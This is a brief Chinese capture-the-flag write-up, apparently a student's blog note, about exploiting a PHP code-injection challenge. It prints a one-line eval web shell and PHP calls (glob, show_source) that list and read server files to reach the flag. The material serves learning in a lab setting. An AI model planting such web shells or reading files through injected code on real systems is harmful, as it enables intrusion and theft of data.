查看源代码有提示
以为是cmd命令解过输入linux命令愣是没反应后来输入phpinfo()才有回显
原来是被误导了。
一开始想的是直接写入一句话木马
点击查看代码
@eval($_POST['attack']);echo 111;
//这里的echo 111是方便看我们有没有植入成功的
这就有点苦恼了,一时间不知道要怎么搞
上网查了查
先学习一下php的几个命令:
点击查看代码
print_r(glob("*.txt"));查看当前目录下所有txt文件
show_source("1.php") //展示代码常用于读取文件内容
print_r(glob("."));//查看所有文件
show_source()查看这个名字很长的php文件
拿到flag
